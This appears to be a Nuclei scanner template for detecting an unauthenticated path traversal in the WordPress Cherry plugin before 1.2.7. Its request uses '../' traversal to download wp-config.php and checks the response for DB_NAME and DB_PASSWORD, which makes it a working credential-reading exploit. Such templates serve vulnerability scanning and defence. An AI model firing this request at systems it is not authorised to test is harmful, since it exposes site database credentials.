id: cherry-lfi

info:
  name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
  author: dhiyaneshDK
  severity: high
  description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
  reference:
    - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
    - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wpscan,wordpress,wp-plugin,lfi,wp

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# digest: 490a0046304402201f5a66078e337992fdb18f2a7e35cbd8e42f4f0bc30c3e4a3cf7ec7932c860b8022037ba1375b0c76f635e3ec9005f13c3ffeb7d06edf47761016391d6aaf0ec6600:922c64590222798bb761d5b6d8e72950
